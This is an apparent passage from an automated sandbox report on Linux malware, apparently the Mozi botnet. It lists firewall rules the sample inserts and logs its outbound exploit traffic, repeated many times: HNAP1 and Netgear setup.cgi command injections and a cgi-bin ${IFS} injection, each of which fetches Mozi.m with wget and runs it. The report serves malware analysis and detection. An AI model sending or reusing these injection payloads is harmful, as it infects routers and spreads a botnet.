Source: /bin/sh (PID: 6857) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6863) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6897) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6913) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6935) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6948) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6973) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6992) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6995) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6998) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7010) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7067) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7093) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7122) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7145) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7163) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7179) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7200) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7216) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7230) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7248) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7261) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7290) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7316) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7319) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7327) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7351) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7378) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7405) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7426) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7439) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.54.104.1:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 175.119.69.229:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</I
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 112.74.206.52:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: unknown TCP traffic detected without corresponding DNS query: 5.89.214.135
Source: unknown TCP traffic detected without corresponding DNS query: 149.185.53.154
Source: unknown TCP traffic detected without corresponding DNS query: 155.61.123.253
Source: unknown TCP traffic detected without corresponding DNS query: 184.217.35.73
Source: unknown TCP traffic detected without corresponding DNS query: 105.137.202.218
Source: unknown TCP traffic detected without corresponding DNS query: 99.37.65.129
Source: unknown TCP traffic detected without corresponding DNS query: 175.141.183.193
Source: unknown TCP traffic detected without corresponding DNS query: 84.60.151.77
Source: unknown TCP traffic detected without corresponding DNS query: 132.169.224.240
Source: unknown TCP traffic detected without corresponding DNS query: 207.49.85.172
Source: unknown TCP traffic detected without corresponding DNS query: 101.215.138.244
Source: unknown TCP traffic detected without corresponding DNS query: 146.159.89.38
Source: unknown TCP traffic detected without corresponding DNS query: 141.139.161.123
Source: unknown TCP traffic detected without corresponding DNS query: 217.128.81.132
Source: unknown TCP traffic detected without corresponding DNS query: 102.211.48.37
Source: unknown TCP traffic detected without corresponding DNS query: 190.180.20.21
Source: unknown TCP traffic detected without corresponding DNS query: 97.152.141.58
Source: unknown TCP traffic detected without corresponding DNS query: 132.35.122.63
Source: unknown TCP traffic detected without corresponding DNS query: 206.66.211.183
Source: unknown TCP traffic detected without corresponding DNS query: 41.22.25.103
Source: unknown TCP traffic detected without corresponding DNS query: 5.69.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 79.186.143.177
Source: unknown TCP traffic detected without corresponding DNS query: 109.147.241.154
Source: unknown TCP traffic detected without corresponding DNS query: 138.58.82.192
Source: unknown TCP traffic detected without corresponding DNS query: 50.41.174.31
Source: unknown TCP traffic detected without corresponding DNS query: 205.51.46.8
Source: unknown TCP traffic detected without corresponding DNS query: 17.143.195.16
Source: unknown TCP traffic detected without corresponding DNS query: 70.97.76.208
Source: unknown TCP traffic detected without corresponding DNS query: 85.233.216.179
Source: unknown TCP traffic detected without corresponding DNS query: 193.176.243.123
Source: unknown TCP traffic detected without corresponding DNS query: 209.136.182.147
Source: unknown TCP traffic detected without corresponding DNS query: 59.17.48.95
Source: unknown TCP traffic detected without corresponding DNS query: 176.127.83.100
Source: unknown TCP traffic detected without corresponding DNS query: 52.176.185.219
Source: unknown TCP traffic detected without corresponding DNS query: 163.49.20.154
Source: unknown TCP traffic detected without corresponding DNS query: 34.144.108.84
Source: unknown TCP traffic detected without corresponding DNS query: 180.191.141.165
Source: unknown TCP traffic detected without corresponding DNS query: 133.183.45.107
Source: unknown TCP traffic detected without corresponding DNS query: 217.32.46.116
Source: unknown TCP traffic detected without corresponding DNS query: 43.163.194.108
Source: unknown TCP traffic detected without corresponding DNS query: 55.92.128.187
Source: unknown TCP traffic detected without corresponding DNS query: 221.38.227.70
Source: unknown TCP traffic detected without corresponding DNS query: 73.227.59.34
Source: unknown TCP traffic detected without corresponding DNS query: 1.86.24.162
Source: unknown TCP traffic detected without corresponding DNS query: 117.145.177.145
Source: unknown TCP traffic detected without corresponding DNS query: 132.134.9.26
Source: unknown TCP traffic detected without corresponding DNS query: 124.193.58.88
Source: unknown TCP traffic detected without corresponding DNS query: 166.131.20.168
Source: unknown TCP traffic detected without corresponding DNS query: 7.175.103.180
Source: unknown TCP traffic detected without corresponding DNS query: 207.100.187.60
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:45:14 GMTServer: Apache/2.4.51 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4Content-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-storeContent-Type: text/html; charset=utf-8Via: 1.1 spaces-router (e3eb0c1553be)Date: Tue, 16 Nov 2021 14:46:52 GMTContent-Length: 549Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 75 63 68 20 61 70 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 2f 2f 77 77 77 2e 68 65 72 6f 6b 75 63 64 6e 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6e 6f 2d 73 75 63 68 2d 61 70 70 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8"> <title>No such app</title> <style media="screen"> html,body,iframe { margin: 0; padding: 0; } html,body { height: 100%; overflow: hidden; } iframe { width: 100%; height: 100%; border: 0; } </style> </head> <body> <iframe src="//www.herokucdn.com/error-pages/no-such-app.html"></iframe> </body></html>
